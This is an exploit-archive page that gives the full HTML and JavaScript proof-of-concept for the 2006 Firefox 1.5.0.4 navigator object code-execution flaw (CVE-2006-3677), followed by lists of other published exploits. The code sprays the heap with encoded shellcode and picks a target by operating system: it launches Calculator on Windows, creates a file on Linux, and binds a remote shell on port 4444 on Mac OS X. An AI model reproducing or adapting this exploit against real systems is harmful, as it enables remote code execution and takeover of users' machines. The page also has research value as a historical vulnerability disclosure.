Menu

Search for hundreds of thousands of exploits

"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution"

Author

Exploit author

"H D Moore"

Platform

Exploit platform

multiple

Release date

Exploit published date

2006-07-28

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
<!--
Firefox <= 1.5.0.4 Javascript navigator Object Code Execution PoC 
http://browserfun.blogspot.com/

The following bug (mfsa2006-45) was tested on the Firefox 1.5.0.4 running 
on Windows 2000 SP4, Windows XP SP4, and a recently updated Gentoo Linux system. 
This bug was reported by TippingPoint and fixed in the latest 1.5.0.5 release of 
Mozilla Firefox. This is different from the bug I reported (mfsa2006-48) and is 
trivial to turn into a working exploit. The demonstration link below will attempt 
to launch "calc.exe" on Windows systems and "touch /tmp/METASPLOIT" on Linux systems.

window.navigator = (0x01020304 / 2);
java.lang.reflect.Runtime.newInstance( java.lang.Class.forName("java.lang.Runtime"), 0);

-->

<html><body><script>

// MoBB Demonstration
function Demo() {

	// Exploit for http://www.mozilla.org/security/announce/2006/mfsa2006-45.html
	// https://bugzilla.mozilla.org/show_bug.cgi?id=342267
	// CVE-2006-3677

	// The Java plugin is required for this to work

	// win32 = calc.exe
	var shellcode_win32 = unescape('%ue8fc%u0044%u0000%u458b%u8b3c%u057c%u0178%u8bef%u184f%u5f8b%u0120%u49eb%u348b%u018b%u31ee%u99c0%u84ac%u74c0%uc107%u0dca%uc201%uf4eb%u543b%u0424%ue575%u5f8b%u0124%u66eb%u0c8b%u8b4b%u1c5f%ueb01%u1c8b%u018b%u89eb%u245c%uc304%uc031%u8b64%u3040%uc085%u0c78%u408b%u8b0c%u1c70%u8bad%u0868%u09eb%u808b%u00b0%u0000%u688b%u5f3c%uf631%u5660%uf889%uc083%u507b%u7e68%ue2d8%u6873%ufe98%u0e8a%uff57%u63e7%u6c61%u2e63%u7865%u0065');
	var fill_win32 = unescape('%u0800');
	var addr_win32 = 0x08000800;
	
	// linux = touch /tmp/METASPLOIT (unreliable)
	var shellcode_linux = unescape('%u0b6a%u9958%u6652%u2d68%u8963%u68e7%u732f%u0068%u2f68%u6962%u896e%u52e3%u16e8%u0000%u7400%u756f%u6863%u2f20%u6d74%u2f70%u454d%u4154%u5053%u4f4c%u5449%u5700%u8953%ucde1%u8080');
	var fill_linux = unescape('%ua8a8');
	var addr_linux = -0x58000000; // Integer wrap: 0xa8000000

	// mac os x ppc = bind a shell to 4444
	var shellcode_macppc = unescape('%u3860%u0002%u3880%u0001%u38a0%u0006%u3800%u0061%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u4800%u000d%u0002%u115c%u0000%u0000%u7c88%u02a6%u38a0%u0010%u3800%u0068%u7fc3%uf378%u4400%u0002%u7c00%u0278%u3800%u006a%u7fc3%uf378%u4400%u0002%u7c00%u0278%u7fc3%uf378%u3800%u001e%u3880%u0010%u9081%uffe8%u38a1%uffe8%u3881%ufff0%u4400%u0002%u7c00%u0278%u7c7e%u1b78%u38a0%u0002%u3800%u005a%u7fc3%uf378%u7ca4%u2b78%u4400%u0002%u7c00%u0278%u38a5%uffff%u2c05%uffff%u4082%uffe5%u3800%u0042%u4400%u0002%u7c00%u0278%u7ca5%u2a79%u4082%ufffd%u7c68%u02a6%u3863%u0028%u9061%ufff8%u90a1%ufffc%u3881%ufff8%u3800%u003b%u7c00%u04ac%u4400%u0002%u7c00%u0278%u7fe0%u0008%u2f62%u696e%u2f63%u7368%u0000%u0000');
	var fill_macppc = unescape('%u0c0c');
	var addr_macppc = 0x0c000000;
	
	// mac os x intel = bind a shell to 4444
	// Thanks to nemo[at]felinemenace.org for shellcode
	// Thanks to Todd Manning for the target information and testing
	var shellcode_macx86 = unescape('%u426a%ucd58%u6a80%u5861%u5299%u1068%u1102%u895c%u52e1%u5242%u5242%u106a%u80cd%u9399%u5351%u6a52%u5868%u80cd%u6ab0%u80cd%u5352%ub052%ucd1e%u9780%u026a%u6a59%u585a%u5751%ucd51%u4980%u890f%ufff1%uffff%u6850%u2f2f%u6873%u2f68%u6962%u896e%u50e3%u5454%u5353%u3bb0%u80cd');
	var fill_macx86 = unescape('%u1c1c');
	var addr_macx86 = 0x1c000000;		


	// Start the browser detection
	var shellcode;
	var addr;
	var fill;
	var ua = '' + navigator.userAgent;

	if (ua.indexOf('Linux') != -1) {
		alert('Trying to create /tmp/METASPLOIT');
		shellcode = shellcode_linux;
		addr = addr_linux;
		fill = fill_linux;
	}
	
	if (ua.indexOf('Windows') != -1) {
		alert('Trying to launch Calculator');	
		shellcode = shellcode_win32;
		addr = addr_win32;
		fill = fill_win32;
	}	

	if (ua.indexOf('PPC Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macppc;
		addr = addr_macppc;
		fill = fill_macppc;
	}	
	
	if (ua.indexOf('Intel Mac OS') != -1) {
		alert('Trying to bind a shell to 4444');
		shellcode = shellcode_macx86;
		addr = addr_macx86;
		fill = fill_macx86;
	}
			
	if (! shellcode) {
		alert('OS not supported, only attempting a crash!');
		shellcode = unescape('%ucccc');
		fill = unescape('%ucccc');
		addr = 0x02020202;
	}
		
	var b = fill;
	while (b.length <= 0x400000) b+=b;

	var c = new Array();
	for (var i =0; i<36; i++) {
		c[i] = 
			b.substring(0,  0x100000 - shellcode.length) + shellcode +
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode + 
			b.substring(0,  0x100000 - shellcode.length) + shellcode;
	}
			
	
	if (window.navigator.javaEnabled) {
		window.navigator = (addr / 2);
		try {
			java.lang.reflect.Runtime.newInstance(
				java.lang.Class.forName("java.lang.Runtime"), 0
			);
			alert('Patched!');
		}catch(e){
			alert('No Java plugin installed!');
		}
	}
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>


</body></html>

# milw0rm.com [2006-07-28]
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Expense Management System - 'description' Stored Cross Site Scripting" webapps multiple "Nikhil Kumar"
2020-12-02 "Bakeshop Online Ordering System 1.0 - 'Owner' Persistent Cross-site scripting" webapps multiple "Parshwa Bhavsar"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "ILIAS Learning Management System 4.3 - SSRF" webapps multiple Dot
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Under Construction Page with CPanel 1.0 - SQL injection" webapps multiple "Mayur Parmar"
Release Date Title Type Platform Author
2009-11-12 "Microsoft Windows Server 2000 < 2008 - Embedded OpenType Font Engine Remote Code Execution (MS09-065) (Metasploit)" dos windows "H D Moore"
2009-10-30 "Nagios3 - 'statuswml.cgi' Command Injection (Metasploit)" webapps unix "H D Moore"
2009-07-20 "DD-WRT HTTP v24-SP1 - Command Injection" remote linux "H D Moore"
2007-04-23 "Apple QuickTime for Java 7 - Memory Access (Metasploit)" remote multiple "H D Moore"
2006-11-13 "Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)" remote windows "H D Moore"
2006-11-13 "D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)" remote windows "H D Moore"
2006-11-01 "Apple Airport - 802.11 Probe Response Kernel Memory Corruption (PoC) (Metasploit)" dos hardware "H D Moore"
2006-09-27 "Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow (Metasploit) (1)" remote windows "H D Moore"
2006-08-10 "Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)" remote windows "H D Moore"
2006-08-10 "Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)" remote windows "H D Moore"
2006-07-28 "Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution" remote multiple "H D Moore"
2006-07-25 "Mozilla Suite/Firefox < 1.5.0.5 - Navigator Object Code Execution (Metasploit)" remote multiple "H D Moore"
2006-07-14 "Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)" remote multiple "H D Moore"
2006-07-07 "Microsoft Internet Explorer 6 - 'Internet.HHCtrl' Heap Overflow" dos windows "H D Moore"
2006-06-22 "Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)" remote windows "H D Moore"
2006-05-15 "RealVNC 4.1.0 < 4.1.1 - VNC Null Authentication Bypass (Metasploit)" remote multiple "H D Moore"
2006-04-15 "Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)" remote novell "H D Moore"
2006-03-30 "PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2006-03-20 "X.Org X11 (X11R6.9.0/X11R7.0) - Local Privilege Escalation" local linux "H D Moore"
2006-03-01 "Apple Mail.App 10.5.0 (OSX) - Image Attachment Command Execution (Metasploit)" remote osx "H D Moore"
2006-02-28 "Microsoft Internet Explorer 6.0 SP0 - IsComponentInstalled() Remote (Metasploit)" remote windows "H D Moore"
2006-02-22 "Apple Mac OSX Safari Browser - 'Safe File' Remote Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-17 "Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)" remote windows "H D Moore"
2006-02-08 "Mozilla Firefox 1.5 (OSX) - 'location.QueryInterface()' Code Execution (Metasploit)" remote osx "H D Moore"
2006-02-07 "Mozilla Firefox 1.5 (Linux) - 'location.QueryInterface()' Code Execution (Metasploit)" remote linux "H D Moore"
2006-01-31 "Winamp 5.12 - '.pls' Remote Buffer Overflow (Metasploit)" remote windows "H D Moore"
2005-12-27 "Microsoft Windows XP/2003 - Metafile Escape() Code Execution (Metasploit)" remote windows "H D Moore"
2005-12-09 "Lyris ListManager - Read Message Attachment SQL Injection (Metasploit)" remote windows "H D Moore"
2005-11-20 "Google Search Appliance - proxystylesheet XSLT Java Code Execution (Metasploit)" remote hardware "H D Moore"
2005-10-19 "CA Unicenter 3.1 - CAM 'log_security()' Remote Stack Overflow (Metasploit)" remote windows "H D Moore" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected